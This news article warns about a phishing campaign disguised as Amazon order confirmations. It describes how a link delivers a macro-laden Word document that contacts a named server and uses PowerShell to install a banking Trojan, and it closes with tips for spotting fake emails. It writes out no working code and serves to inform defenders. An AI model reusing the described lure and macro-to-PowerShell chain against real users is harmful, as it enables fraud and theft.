Cybercriminals are always on the look out to exploit peoples rush to get stuff done and get those last minute online shopping delivered or taken care of.
With an increasing number of us doing the majority of our shopping online, threat actors are seizing upon the opportunity to conduct email spamming campaigns that target popular delivery companies like Amazon.
Cybersecurity enterprise EdgeWare have uncovered a well disguised email campaign masquerading as Amazon order confirmations,.
When a user opens these emails they are showed the order confirmation stating that your package has been shipped, however no actual order information is visible such as what the item is or to whom it is deliverable. To get this information the email directs the user to click on the ‘Order Details’ see more information.
Unfortunately this is where you trouble begins according to EdgeWare who found that: “Clicking Order Details connects to unique subdirectory at lancang.desa.id and downloads a Microsoft Word document titled order_details.doc. Opening this document activates a macro that contacts palapa2.lazeon.com at IP 101.50.1.12 (the same server that hosts lancang.desa.id, located in Indonesia)”
Once this process starts your system is open to the installation of malicious software.
Amazon Email Scam
Clicking Order Details can also open up a Microsoft Office Document which then asks you to enable content, doing so will trigger a PowerShell command that results in the undetected download of a banking Trojan to your device.
PowerShell is a scripting language that when used by threat actors can give them unrestricted access to Windows APIs and system inner core.
Fred O’Connor researcher at endpoint security company Cyberreason commented in a blog that: “PowerShell’s ability to run remotely through WinRM makes it an even more appealing tool. This feature enables attackers to get through Windows Firewall, run PowerShell scripts remotely or simply drop into an interactive PowerShell session, providing complete admin control over an endpoint.”
See Also: NASA Servers Breached: “A Top Agency Priority”
In order to avoid been caught out by malicious campaigns like this user must be vigilant when it comes to what they open, especially if it is a Microsoft word document.
When receiving order confirmations your names and some identifying details should be present. Be wary of anything that looks vague and could be sent out on-mass. Reading addresses is something we passively do, often with little regard to spelling, however incorrect spelling in an address is a key indicator that something is amiss and is one to watch out for.